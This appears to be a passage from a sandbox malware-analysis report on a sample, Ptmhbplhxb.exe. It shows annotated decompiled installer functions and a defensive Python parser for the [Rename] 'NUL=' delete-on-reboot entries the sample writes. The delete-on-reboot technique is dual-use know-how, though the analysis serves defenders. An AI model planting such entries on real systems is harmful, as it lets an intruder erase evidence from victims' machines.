                0x00403c6d
                0x00403c59
                0x00403c59
                0x00403c5b
                0x00403c5b
                0x00000000
                0x00403c5b
                0x00403c4e
                0x00403c53
                0x00000000
                0x00403c53
                0x00403c32
                0x00403c38
                0x00000000
                0x00000000
                0x00403c3a
                0x00000000
                0x00403c3a
                0x00403c2a
                0x00000000
                0x00403c2a
                0x00403c10
                0x00403c17
                0x00403c1d
                0x00403c1f
                0x00000000
                0x00000000
                0x00000000
                0x00403c1f
                0x00403bdb
                0x00000000
                0x00403bb9
                0x00403bbf
                0x00403bc9
                0x00403fd0
                0x00403fd0
                0x00403fd6
                0x00403fd8
                0x00403fde
                0x00403fe3
                0x00403fe9
                0x00403fe9
                0x00403fde
                0x00403ff3
                0x00000000
                0x00403ff3
                0x00403bb7

                APIs
                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B8E
                • ShowWindow.USER32(?), ref: 00403BAB
                • DestroyWindow.USER32 ref: 00403BBF
                • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BDB
                • GetDlgItem.USER32 ref: 00403BFC
                • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403C10
                • IsWindowEnabled.USER32(00000000), ref: 00403C17
                • GetDlgItem.USER32 ref: 00403CC5
                • GetDlgItem.USER32 ref: 00403CCF
                • SetClassLongA.USER32(?,000000F2,?,0000001C,000000FF), ref: 00403CE9
                • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D3A
                • GetDlgItem.USER32 ref: 00403DE0
                • ShowWindow.USER32(00000000,?), ref: 00403E01
                • EnableWindow.USER32(?,?), ref: 00403E13
                • EnableWindow.USER32(?,?), ref: 00403E2E
                • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E44
                • EnableMenuItem.USER32 ref: 00403E4B
                • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403E63
                • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E76
                • lstrlenA.KERNEL32(0042A870,?,0042A870,00000000), ref: 00403EA0
                • SetWindowTextA.USER32(?,0042A870), ref: 00403EAF
                • ShowWindow.USER32(?,0000000A), ref: 00403FE3
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                • String ID:
                • API String ID: 184305955-0
                • Opcode ID: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
                • Instruction ID: 825bbfaa6b66e15a56cde4951677423d70b10f791e0768be12abaf391e468a8e
                • Opcode Fuzzy Hash: 73a332412999680b2dcb521756cc8655f7b5c6597c26b8181da5b9882737dc52
                • Instruction Fuzzy Hash: 80C19F71604205AFDB206F22EE45E2B3EBCFB4570AF40053EFA42B11E1CB7999429B1D
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 93%
                			E0040416F(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
                				intOrPtr _v8;
                				signed int _v12;
                				void* _v16;
                				struct HWND__* _t52;
                				long _t86;
                				int _t98;
                				struct HWND__* _t99;
                				signed int _t100;
                				signed int _t106;
                				intOrPtr _t107;
                				intOrPtr _t109;
                				int _t110;
                				signed int* _t112;
                				signed int _t113;
                				char* _t114;
                				CHAR* _t115;
                
                				if(_a8 != 0x110) {                                   /* 0x110 = WM_INITDIALOG */
                					__eflags = _a8 - 0x111;
                					if(_a8 != 0x111) {                               /* 0x111 = WM_COMMAND */
                						L11:
                						__eflags = _a8 - 0x4e;
                						if(_a8 != 0x4e) {                            /* 0x4e = WM_NOTIFY */
                							__eflags = _a8 - 0x40b;
                							if(_a8 == 0x40b) {                       /* 0x40b = WM_USER+11, private message: bump the counter at 0x42983c */
                								 *0x42983c =  *0x42983c + 1;
                								__eflags =  *0x42983c;
                							}
                							L25:
                							_t110 = _a16;
                							L26:
                							return E0040408D(_a8, _a12, _t110);
                						}
                						_t52 = GetDlgItem(_a4, 0x3e8);               /* control 1000: the rich-edit text box */
                						_t110 = _a16;                                /* lParam = NMHDR* */
                						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x70b;
                						if( *((intOrPtr*)(_t110 + 8)) == 0x70b) {    /* NMHDR.code == EN_LINK (0x70b) */
                							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x201;
                							if( *((intOrPtr*)(_t110 + 0xc)) == 0x201) {  /* ENLINK.msg == WM_LBUTTONDOWN: a link in the text was clicked */
                								_t100 =  *((intOrPtr*)(_t110 + 0x1c));   /* ENLINK.chrg.cpMax */
                								_t109 =  *((intOrPtr*)(_t110 + 0x18));   /* ENLINK.chrg.cpMin */
                								_v12 = _t100;
                								__eflags = _t100 - _t109 - 0x800;
                								_v16 = _t109;
                								_v8 = 0x42e3a0;                          /* _v16.._v8 form a TEXTRANGEA {cpMin, cpMax, lpstrText}; destination buffer at 0x42e3a0 */
                								if(_t100 - _t109 < 0x800) {              /* only fetch links that fit the 0x800-byte buffer */
                									SendMessageA(_t52, 0x44b, 0,  &_v16);    /* EM_GETTEXTRANGE: copy the link text out of the control */
                									SetCursor(LoadCursorA(0, 0x7f02));       /* IDC_WAIT */
                									_push(1);
                									E00404413(_a4, _v8);                     /* act on the extracted link text (callee not shown on this page) */
                									SetCursor(LoadCursorA(0, 0x7f00));       /* IDC_ARROW */
                									_t110 = _a16;
                									_t110 = _a16;
                								}
                							}
                						}
                						__eflags =  *((intOrPtr*)(_t110 + 8)) - 0x700;
                						if( *((intOrPtr*)(_t110 + 8)) != 0x700) {    /* NMHDR.code == EN_MSGFILTER (0x700)? */
                							goto L26;
                						} else {
                							__eflags =  *((intOrPtr*)(_t110 + 0xc)) - 0x100;
                							if( *((intOrPtr*)(_t110 + 0xc)) != 0x100) {  /* MSGFILTER.msg == WM_KEYDOWN? */
                								goto L26;
                							}
                							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0xd;
                							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {   /* MSGFILTER.wParam == VK_RETURN */
                								SendMessageA( *0x42f408, 0x111, 1, 0);   /* WM_COMMAND(IDOK) to the main window at 0x42f408 */
                							}
                							__eflags =  *((intOrPtr*)(_t110 + 0x10)) - 0x1b;
                							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {  /* VK_ESCAPE */
                								SendMessageA( *0x42f408, 0x10, 0, 0);    /* WM_CLOSE to the main window */
                							}
                							return 1;
                						}
                					}
                					__eflags = _a12 >> 0x10;
                					if(_a12 >> 0x10 != 0) {                          /* HIWORD(wParam) is the notification code: only handle 0 (BN_CLICKED) */
                						goto L25;
                					}
                					__eflags =  *0x42983c; // 0x0
                					if(__eflags != 0) {
                						goto L25;
                					}
                					_t112 =  *0x42a048 + 0x14;                       /* page flags word */
                					__eflags =  *_t112 & 0x00000020;
                					if(( *_t112 & 0x00000020) == 0) {
                						goto L25;
                					}
                					/* control 1034 (0x40a) is the checkbox; BM_GETCHECK (0xf0) returns BST_CHECKED (1), stored in flag bit 0 */
                					_t106 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
                					__eflags = _t106;
                					 *_t112 = _t106;
                					E00404048(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);   /* propagate the checkbox state (callee not shown on this page) */
                					E004043EF();
                					goto L11;
                				} else {
                					_t98 = _a16;                                     /* lParam: page descriptor */
                					_t113 =  *(_t98 + 0x30);
                					if(_t113 < 0) {                                  /* negative value = index into the string table at *0x42ebdc */
                						_t107 =  *0x42ebdc; // 0x84bb3a
                						_t113 =  *(_t107 - 4 + _t113 * 4);
                					}
                					_push( *((intOrPtr*)(_t98 + 0x34)));
                					_t114 = _t113 +  *0x42f458;                      /* offset into the string block: the text shown in the rich edit */
                					_push(0x22);
                					_a16 =  *_t114;                                  /* first byte selects the stream format passed to EM_STREAMIN */
                					_v12 = _v12 & 0x00000000;
                					_t115 = _t114 + 1;                               /* the text itself starts after that byte */
                					_v16 = _t115;                                    /* _v16.._v8 form an EDITSTREAM {dwCookie = text pointer, dwError = 0, pfnCallback = E0040413A} */
                					_v8 = E0040413A;
                					E00404026(_a4);                                  /* set the text of dialog items 0x22 and 0x23 (callee not shown on this page) */
                					_push( *((intOrPtr*)(_t98 + 0x38)));
                					_push(0x23);
                					E00404026(_a4);
                					/* tick control 0x40a or 0x40b depending on bits 0 and 5 of the descriptor's flags word at +0x14 */
                					CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
                					E00404048( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
                					_t99 = GetDlgItem(_a4, 0x3e8);                   /* the rich edit, control 1000 */
                					E0040405B(_t99);
                					SendMessageA(_t99, 0x45b, 1, 0);                 /* EM_AUTOURLDETECT: URLs in the text become clickable links */
                					_t86 =  *( *0x42f414 + 0x68);
                					if(_t86 < 0) {
                						_t86 = GetSysColor( ~_t86);                  /* negative colour value = ~COLOR_* index, resolved through GetSysColor */
                					}
                					SendMessageA(_t99, 0x443, 0, _t86);              /* EM_SETBKGNDCOLOR */
                					SendMessageA(_t99, 0x445, 0, 0x4010000);         /* EM_SETEVENTMASK: ENM_LINK | ENM_KEYEVENTS, so EN_LINK and EN_MSGFILTER reach the WM_NOTIFY branch above */
                					SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));   /* EM_EXLIMITTEXT to the length of the text */
                					 *0x42983c = 0;
                					SendMessageA(_t99, 0x449, _a16,  &_v16);         /* EM_STREAMIN: feed the text through the EDITSTREAM callback */
                					 *0x42983c = 0;
                					return 0;
                				}
                			}

                APIs
                • CheckDlgButton.USER32 ref: 004041FA
                • GetDlgItem.USER32 ref: 0040420E
                • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040422C
                • GetSysColor.USER32(?), ref: 0040423D
                • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040424C
                • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040425B
                • lstrlenA.KERNEL32(?), ref: 0040425E
                • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040426D
                • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404282
                • GetDlgItem.USER32 ref: 004042E4
                • SendMessageA.USER32(00000000), ref: 004042E7
                • GetDlgItem.USER32 ref: 00404312
                • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404352
                • LoadCursorA.USER32 ref: 00404361
                • SetCursor.USER32(00000000), ref: 0040436A
                • LoadCursorA.USER32 ref: 00404380
                • SetCursor.USER32(00000000), ref: 00404383
                • SendMessageA.USER32(00000111,00000001,00000000), ref: 004043AF
                • SendMessageA.USER32(00000010,00000000,00000000), ref: 004043C3
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                • String ID: :A@$N
                • API String ID: 3103080414-504195219
                • Opcode ID: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                • Instruction ID: 4cc5751811e84191dd39768f0d3a0055f5535ab869bb222e46a2b56927204bf5
                • Opcode Fuzzy Hash: cd245b479e67a0965af24715bd7e729d27bd81987a0dae74a39f742a14bba925
                • Instruction Fuzzy Hash: DA6183B1A00205BFEB10AF61DD45F6A7B69EB84715F00413AFB05BA1D1C7B8A951CF98
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 90%
                			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
                				struct tagLOGBRUSH _v16;
                				struct tagRECT _v32;
                				struct tagPAINTSTRUCT _v96;
                				struct HDC__* _t70;
                				struct HBRUSH__* _t87;
                				struct HFONT__* _t94;
                				long _t102;
                				signed int _t126;
                				struct HDC__* _t128;
                				intOrPtr _t130;
                
                				if(_a8 == 0xf) {                                     /* WM_PAINT */
                					_t130 =  *0x42f414;                              /* global configuration block (colours at +0x50/+0x54/+0x58, font at +0x34) */
                					_t70 = BeginPaint(_a4,  &_v96);
                					_v16.lbStyle = _v16.lbStyle & 0x00000000;
                					_a8 = _t70;
                					GetClientRect(_a4,  &_v32);
                					_t126 = _v32.bottom;
                					_v32.bottom = _v32.bottom & 0x00000000;
                					while(_v32.top < _t126) {                        /* fill the client area in 4-pixel bands, blending colour +0x50 (top) into colour +0x54 (bottom) */
                						_a12 = _t126 - _v32.top;
                						asm("cdq");                                  /* three cdq/idiv pairs: one division per colour channel */
                						asm("cdq");
                						asm("cdq");
                						/* (c_top * (height - y) + c_bottom * y) / height per channel; the decompiler kept only the low channel, hence the "0 << 8" */
                						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
                						_t87 = CreateBrushIndirect( &_v16);
                						_v32.bottom = _v32.bottom + 4;
                						_a16 = _t87;
                						FillRect(_a8,  &_v32, _t87);
                						DeleteObject(_a16);
                						_v32.top = _v32.top + 4;
                					}
                					if( *(_t130 + 0x58) != 0xffffffff) {             /* text colour of -1 means: draw no caption */
                						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
                						_a16 = _t94;
                						if(_t94 != 0) {
                							_t128 = _a8;
                							_v32.left = 0x10;
                							_v32.top = 8;
                							SetBkMode(_t128, 1);                     /* TRANSPARENT */
                							SetTextColor(_t128,  *(_t130 + 0x58));
                							_a8 = SelectObject(_t128, _a16);
                							DrawTextA(_t128, "Setup Setup", 0xffffffff,  &_v32, 0x820);   /* length -1 = NUL-terminated; 0x820 = DT_SINGLELINE | DT_NOPREFIX */
                							SelectObject(_t128, _a8);
                							DeleteObject(_a16);
                						}
                					}
                					EndPaint(_a4,  &_v96);
                					return 0;
                				}
                				_t102 = _a16;
                				if(_a8 == 0x46) {                                    /* WM_WINDOWPOSCHANGING, lParam = WINDOWPOS* */
                					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010; /* WINDOWPOS.flags |= SWP_NOACTIVATE */
                					 *((intOrPtr*)(_t102 + 4)) =  *0x42f408;         /* WINDOWPOS.hwndInsertAfter = main window at 0x42f408: keep this backdrop window behind it */
                				}
                				return DefWindowProcA(_a4, _a8, _a12, _t102);
                			}

                APIs
                • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                • BeginPaint.USER32(?,?), ref: 00401047
                • GetClientRect.USER32 ref: 0040105B
                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                • FillRect.USER32 ref: 004010E4
                • DeleteObject.GDI32(?), ref: 004010ED
                • CreateFontIndirectA.GDI32(?), ref: 00401105
                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                • SelectObject.GDI32(00000000,?), ref: 00401140
                • DrawTextA.USER32(00000000,Setup Setup,000000FF,00000010,00000820), ref: 00401156
                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                • DeleteObject.GDI32(?), ref: 00401165
                • EndPaint.USER32(?,?), ref: 0040116E
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                • String ID: F$Setup Setup
                • API String ID: 941294808-1602013819
                • Opcode ID: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                • Instruction ID: bc05fa60d2536021e17fc8d2ced0f843766159cda975d832d6f25ccf31630e85
                • Opcode Fuzzy Hash: 7a376c2f3ff8560e710422255b7ff54b6ff7317a13ba8817f722ed9a279a5648
                • Instruction Fuzzy Hash: C8419C71800209AFCF058F95DE459AFBBB9FF44310F00802EF9A1AA1A0C774D955DFA4
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 100%
                			E00405BD4(void* __ecx) {
                				void* __ebx;
                				void* __edi;
                				void* __esi;
                				long _t12;
                				long _t24;
                				char* _t21;                                         /* result of the "[Rename]" search; missing from the raw decompile */
                				char* _t31;
                				int _t37;
                				void* _t38;
                				intOrPtr* _t39;
                				long _t42;
                				CHAR* _t44;
                				void* _t46;
                				void* _t48;
                				void* _t49;
                				void* _t52;
                				void* _t53;
                
                				_t38 = __ecx;
                				_t44 =  *(_t52 + 0x14);                             /* destination path, or 0 for "delete the source on reboot" */
                				 *0x42c600 = 0x4c554e;                              /* little-endian "NUL\0": the key written when no destination is given */
                				if(_t44 == 0) {
                					L3:
                					_t12 = GetShortPathNameA( *(_t52 + 0x1c), 0x42ca00, 0x400);   /* source path -> 8.3 form at 0x42ca00 */
                					if(_t12 != 0 && _t12 <= 0x400) {
                						_t37 = wsprintfA(0x42c200, "%s=%s\r\n", 0x42c600, 0x42ca00);   /* "<dst>=<src>\r\n" or "NUL=<src>\r\n"; _t37 = its length */
                						_t53 = _t52 + 0x10;
                						E00405F87(_t37, 0x400, 0x42ca00, 0x42ca00,  *((intOrPtr*)( *0x42f414 + 0x128)));   /* expand the ini file path from config offset 0x128 into 0x42ca00 (value not shown on this page) */
                						_t12 = E00405AFE(0x42ca00, 0xc0000000, 4);      /* open it: GENERIC_READ | GENERIC_WRITE, OPEN_ALWAYS */
                						_t48 = _t12;
                						 *(_t53 + 0x18) = _t48;
                						if(_t48 != 0xffffffff) {                        /* INVALID_HANDLE_VALUE */
                							_t42 = GetFileSize(_t48, 0);
                							_t6 = _t37 + 0xa; // 0xa
                							_t46 = GlobalAlloc(0x40, _t42 + _t6);       /* GPTR: file size + new line + 10 bytes for a possible "[Rename]\r\n" header */
                							if(_t46 == 0 || E00405B76(_t48, _t46, _t42) == 0) {   /* read the whole file into the buffer */
                								L18:
                								return CloseHandle(_t48);
                							} else {
                								_t21 = E00405A63(_t38, _t46, "[Rename]\r\n");   /* substring search for the section header (raw decompile used _t21 without assigning it) */
                								if(_t21 != 0) {
                									_t49 = E00405A63(_t38, _t21 + 0xa, 0x40a3b8);   /* search past the header for the constant at 0x40a3b8, presumably the next-section marker (not shown on this page) */
                									if(_t49 == 0) {
                										_t48 =  *(_t53 + 0x18);
                										L16:
                										_t24 = _t42;                                /* no following section: append at end of file */
                										L17:
                										E00405AB9(_t24 + _t46, 0x42c200, _t37);     /* copy the new line into the buffer at offset _t24 */
                										SetFilePointer(_t48, 0, 0, 0);              /* FILE_BEGIN */
                										E00405BA5(_t48, _t46, _t42 + _t37);         /* write the whole buffer back */
                										GlobalFree(_t46);
                										goto L18;
                									}
                									_t39 = _t46 + _t42;
                									_t31 = _t39 + _t37;
                									while(_t39 > _t49) {                        /* shift everything from the next section to EOF down by the line length */
                										 *_t31 =  *_t39;
                										_t31 = _t31 - 1;
                										_t39 = _t39 - 1;
                									}
                									_t24 = _t49 - _t46 + 1;                     /* insert right after the matched byte, i.e. before the next section header */
                									_t48 =  *(_t53 + 0x18);
                									goto L17;
                								}
                								lstrcpyA(_t46 + _t42, "[Rename]\r\n");          /* no section yet: append the header, the new line goes right after it */
                								_t42 = _t42 + 0xa;
                								goto L16;
                							}
                						}
                					}
                				} else {
                					CloseHandle(E00405AFE(_t44, 0, 1));                 /* CREATE_NEW with no access: make sure the destination exists so it has a short name */
                					_t12 = GetShortPathNameA(_t44, 0x42c600, 0x400);    /* destination -> 8.3 form, replacing the "NUL" key */
                					if(_t12 != 0 && _t12 <= 0x400) {
                						goto L3;
                					}
                				}
                				return _t12;
                			}
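The decompiled function above appends a single line to the `[Rename]` section of an ini-style file: both paths are converted to 8.3 short names, the line is formatted as `<dst>=<src>\r\n`, and when no destination is supplied the key is the literal `NUL`, which is the long-standing `wininit.ini` convention for "delete this file on the next reboot". The Python below is an added example, not code from the report or from the sample: it models that insertion logic on in-memory bytes and pairs it with a parser that lists the pending entries, which is the check a responder wants when triaging a host for this mechanism. It assumes that the string constant at 0x40a3b8 (not shown on the page) is the next-section marker `"\n["`, leaves out the Windows-only short-path conversion, and uses constructed sample content.

```python
"""Added example: in-memory model of the [Rename]-section append logic seen in
the decompiled function E00405BD4, plus a parser for triage. Not code from the
report or from the sample; NEXT_SECTION is an assumption about 0x40a3b8."""
from typing import List, Optional, Tuple

RENAME_HEADER = b"[Rename]\r\n"   # literal seen in the decompiled code
NEXT_SECTION = b"\n["             # ASSUMED value of the constant at 0x40a3b8
DELETE_KEY = "NUL"                # 0x4c554e stored little-endian is "NUL\0"


def add_rename_entry(content: bytes, src_short: str, dst_short: Optional[str]) -> bytes:
    """Return `content` with "<dst>=<src>\\r\\n" added to its [Rename] section.

    dst_short None -> key "NUL" (delete src on reboot), as the sample does when
    its destination argument is zero. Placement follows the decompiled code:
    no section -> append "[Rename]\\r\\n" and then the line; section present
    and followed by another section -> insert just before that section's
    header; section is the last one -> append at end of file.
    """
    key = DELETE_KEY if dst_short is None else dst_short
    line = f"{key}={src_short}\r\n".encode("ascii")
    header_pos = content.find(RENAME_HEADER)          # plain substring match, like the sample
    if header_pos < 0:
        return content + RENAME_HEADER + line
    first_line = header_pos + len(RENAME_HEADER)      # "_t21 + 0xa" in the decompile
    next_section = content.find(NEXT_SECTION, first_line)
    if next_section < 0:
        return content + line
    insert_at = next_section + 1                      # after the '\n', before the '['
    return content[:insert_at] + line + content[insert_at:]


def parse_rename_section(content: bytes) -> List[Tuple[str, str, bool]]:
    """List (dst, src, is_delete) for every entry of the [Rename] section.

    Section matching is case-insensitive here, as the ini reader treats it;
    the sample's own search is a plain substring match.
    """
    entries: List[Tuple[str, str, bool]] = []
    in_section = False
    for raw in content.splitlines():
        text = raw.decode("latin-1").strip()
        if not text:
            continue
        if text.startswith("["):
            in_section = text.lower() == "[rename]"
            continue
        if in_section and "=" in text:
            dst, src = text.split("=", 1)
            entries.append((dst, src, dst.upper() == DELETE_KEY))
    return entries


def pending_deletes(content: bytes) -> List[str]:
    """Paths scheduled for deletion on reboot ("NUL=<path>" entries only)."""
    return [src for _dst, src, is_delete in parse_rename_section(content) if is_delete]


# Constructed sample: an ini file that already has a [Rename] section followed
# by another section, the case that exercises the shift-down branch.
SAMPLE_INI = (
    b"[Rename]\r\n"
    b"NUL=C:\\TEMP\\A.TMP\r\n"
    b"[Other]\r\n"
    b"key=value\r\n"
)

if __name__ == "__main__":
    updated = add_rename_entry(SAMPLE_INI, "C:\\TEMP\\B.TMP", None)
    print(updated.decode("ascii"))
    print("pending deletes:", pending_deletes(updated))
```

On a live host the same parser can be pointed at the file the sample writes; any `NUL=` entry naming a path under a temp directory is the artefact to preserve before the machine reboots, since the reboot is what removes it.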

                APIs
                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405D65,?,?), ref: 00405C05
                • GetShortPathNameA.KERNEL32 ref: 00405C0E
                  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405A73
                  • Part of subcall function 00405A63: lstrlenA.KERNEL32(00000000,?,00000000,00405CBE,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AA5
                • GetShortPathNameA.KERNEL32 ref: 00405C2B
                • wsprintfA.USER32 ref: 00405C49
                • GetFileSize.KERNEL32(00000000,00000000,0042CA00,C0000000,00000004,0042CA00,?,?,?,?,?), ref: 00405C84
                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405C93
                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CCB
                • SetFilePointer.KERNEL32(0040A3B8,00000000,00000000,00000000,00000000,0042C200,00000000,-0000000A,0040A3B8,00000000,[Rename],00000000,00000000,00000000), ref: 00405D21
                • GlobalFree.KERNEL32 ref: 00405D32
                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405D39
                  • Part of subcall function 00405AFE: GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\Ptmhbplhxb.exe,80000000,00000003), ref: 00405B02
                  • Part of subcall function 00405AFE: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B24
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.441917774.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.441899890.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441946620.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.441966625.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.442087791.000000000044B000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_Ptmhbplhxb.jbxd
                Similarity
                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                • String ID: %s=%s$[Rename]
                • API String ID: 2171350718-1727408572
                • Opcode ID: 19f304a619b6baa61da18707e398eef91e4d1c241cf3942778bb5909504f8d3d
                • Instruction ID: 17f8f1309641d4637e2ed4fc5cbc189083b9795c86085c8cd532ee5919f79a85
                • Opcode Fuzzy Hash: 19f304a619b6baa61da18707e398eef91e4d1c241cf3942778bb5909504f8d3d
                • Instruction Fuzzy Hash: 61310131601B19ABD2206B65AD8DF6B3A5CDF45714F14053BBA01F62D2EA7CA8018EBD
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 72%
                			E00405F87(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
                				struct _ITEMIDLIST* _v8;
                				char _v12;
                				signed int _v16;
                				signed char _v20;
                				signed int _v24;
                				signed char _v28;
                				signed int _t38;
                				CHAR* _t39;
                				signed int _t41;
                				char _t52;
                				char _t53;
                				char _t55;
                				char _t57;
                				void* _t65;
                				char* _t66;
                				signed int _t80;
                				intOrPtr _t86;
                				char _t88;
                				void* _t89;
                				CHAR* _t90;
                				void* _t92;
                				signed int _t97;
                				signed int _t99;
                				void* _t100;
                
                				_t92 = __esi;
                				_t89 = __edi;
                				_t65 = __ebx;
                				_t38 = _a8; // string-table offset; a negative value selects a language-table entry instead
                				if(_t38 < 0) {
                					_t86 =  *0x42ebdc; // 0x84bb3a
                					_t38 =  *(_t86 - 4 + _t38 * 4);
                				}
                				_push(_t65);
                				_push(_t92);
                				_push(_t89);
                				_t66 = _t38 +  *0x42f458; // input pointer: offset added to the string block base
                				_t39 = 0x42e3a0; // fixed 0x800-byte scratch buffer; output goes here unless _a4 already points into it
                				_t90 = 0x42e3a0;
                				if(_a4 >= 0x42e3a0 && _a4 - 0x42e3a0 < 0x800) {
                					_t90 = _a4;
